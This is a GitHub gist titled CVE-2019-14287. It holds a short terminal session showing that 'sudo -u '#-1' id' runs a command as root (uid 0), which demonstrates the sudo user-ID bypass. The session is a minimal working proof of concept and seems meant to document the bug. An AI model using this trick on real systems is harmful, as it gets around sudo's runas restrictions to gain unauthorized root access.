Created
October 15, 2019 09:04
-
-
Save nna774/c50153b49aa052f21190cf9db78bd439 to your computer and use it in GitHub Desktop.
CVE-2019-14287
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
nana@hibiki:~$ sudo id | |
uid=0(root) gid=0(root) groups=0(root) | |
nana@hibiki:~$ sudo -u '#-1' id | |
uid=0(root) gid=1000(nana) groups=1000(nana) | |
nana@hibiki:~$ id | |
uid=1000(nana) gid=1000(nana) groups=1000(nana),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(lxd),114(netdev) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment